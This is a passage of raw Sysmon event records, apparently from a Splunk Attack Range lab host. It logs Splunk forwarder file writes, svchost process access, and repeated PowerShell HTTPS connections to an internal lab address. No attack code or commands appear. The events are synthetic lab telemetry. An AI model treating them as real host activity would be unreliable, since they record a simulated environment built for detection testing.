Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.076{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-81EE-613A-A096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:42.061{B81B27B7-81EE-613A-A096-03000000C801}1040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:43.525{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3DFB0C04CBF84C289844EECAC44E306,SHA256=A68519E75C5B558DCF3B12B4EF84A7C06E488C0A56C7AD034BC7289571C2240A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:43.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C049035D4EECB8EC1F447EBC71FBEDD6,SHA256=19481E975BFAAB9CC03CA316C1EA361CD5C2DAC3775A60C33ABC026FF509F205,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:44.807{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B3602EF7D106DF64D74ACAE74666E42A,SHA256=C0F2953EC93B5ED3E711014F800D58EC2019F1D3794DBF7821F8D7A31D83509E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:44.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2105F38DF3E3622A9F2819C05954EF8,SHA256=C041F13173103B5B2DC25E22035A00AFAD927F34910C6764270DE4D2B9D2AF17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:09.739{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61979-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:45.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=495613F5C0BCAE672047E5A4AF326FFA,SHA256=9D91A74648C3B4FD4139929601219FF1913A7E4E3290D7AB8F53BD3A8DAA54A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:10.400{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61980-false10.0.1.12-8000- 23542300x800000000000000035127086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:46.574{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4403D6102F62E45C3A6518A069CD56DA,SHA256=9BAD86B204637C606F8EE17DC34D7DC0B4FFDE72B02269C9FD924D81327068A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:47.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=124DCE9F8648A47B5F063B84BF3DD8CC,SHA256=73A2EACFB252EAF3D785420F78E8E77972E64B8E840F5BA67C7C0597AC2EBEB2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:48.836{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A350BAEA54788331336AC5AC3666380B,SHA256=EE3CFA9C01A3C991123A17F9A2B7371CDACA9DED3722DB5E0FE9BD9830F320F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:48.588{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1717CCAED019825EFA7BD11742A11CB1,SHA256=519697AFE303F54BDF9876C476B503FA49D39421F065485B3A0336EB769A7D3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:14.749{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61981-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:49.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA24C9695CA80CB01EF055C4A874414B,SHA256=ACC7995F9A1F67041094E0EFCB32EA78544933FF06AB6AD2F0AAC84066202116,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:50.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D8C0AC8604EAAABAE6B4BE275FE9553,SHA256=3277C420F62046292786EB7B0EEE08BFB7C5983A2575259C20EF9063F05362D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:16.410{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61982-false10.0.1.12-8000- 23542300x800000000000000035127094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:51.884{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1200BFE84333C282025C1F7CA6334A4C,SHA256=6DA56A583624707D3ACB619F156BC31E77823AAF62B6B2CED23EE882353BC1FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:52.899{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E0EF9B4A2BF7C2B0B0DF9F5AEA43267,SHA256=166D5D5EEBEBA43E798E1943353F7A95D28615B4083A3F7676B8FFC4B4FCEFB1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:53.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8739A0ECFBAA533F94B6830C881E8A58,SHA256=8DF57B55E210F82AD91A49315059ADC10B5052BD322AFDFCD65D246EF799934E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:53.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F2B5305B9F17325A8FC22EFBAE53F7DF,SHA256=2D7CC8F4938DB0DDD2158C0BCA76E39671A9D93214FC93CC1C743686055FCF34,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:54.950{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F248E26C38F67156E0E9FB1706000904,SHA256=08BB4E024ECB42230C8C32A57CBEC0B757220001E505BDA480C366DD73AC4D1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:55.964{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E466979C467D4299BA6C2C2D0E66B329,SHA256=0C816FC62DCFD933E64E27F1FBC59407EDF5FAB82AA1C946EF100DB4E0D28A40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:18.761{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61983-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:56.979{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E2C9122F55FA842F8DD57D1ED662F46,SHA256=C7D7E06593C55CCE0FD9E9623F9191F83CA1C2175B9E0732A6EF310C3E6A08CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:57.993{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D23425CA761F3DC4E9BC9A9DC15D9EA,SHA256=A74AFB50FFCC5929903B6DE134C0D0BA55B9A73B7FC45AEFEBD252687C552A0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:22.772{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61985-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:22.225{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61984-false10.0.1.12-8000- 23542300x800000000000000035127105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:57.828{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C49D80CB51A5EEC8427DFA580C0338CB,SHA256=4BA698D517C2CB71DB798AAFCC0C821FAB4A1E381A4E922AD001D0602846FAA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:57.063{B81B27B7-4012-611D-0D00-00000000C801}7924628C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:57.063{B81B27B7-4012-611D-0D00-00000000C801}7924628C:\Windows\system32\svchost.exe{B81B27B7-429F-611D-0601-00000000C801}5536C:\Windows\system32\ServerManager.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:58.908{B81B27B7-4012-611D-0D00-00000000C801}7924628C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:59.944{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:59.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62B8A28A77F14435FEA3FAF86DF2BD76,SHA256=7F57FB4D767F5730A47E29FF0A46D5262CE4D3CC7BDF37B8F5EC983E08DD5925,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127141Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:52:00.106{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 